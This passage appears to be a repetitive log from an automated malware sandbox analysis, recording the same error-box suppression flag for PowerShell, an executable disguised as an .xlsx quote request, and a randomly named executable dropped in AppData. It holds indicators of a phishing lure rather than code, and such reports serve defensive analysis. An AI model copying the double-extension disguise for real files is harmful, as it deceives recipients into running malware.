Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
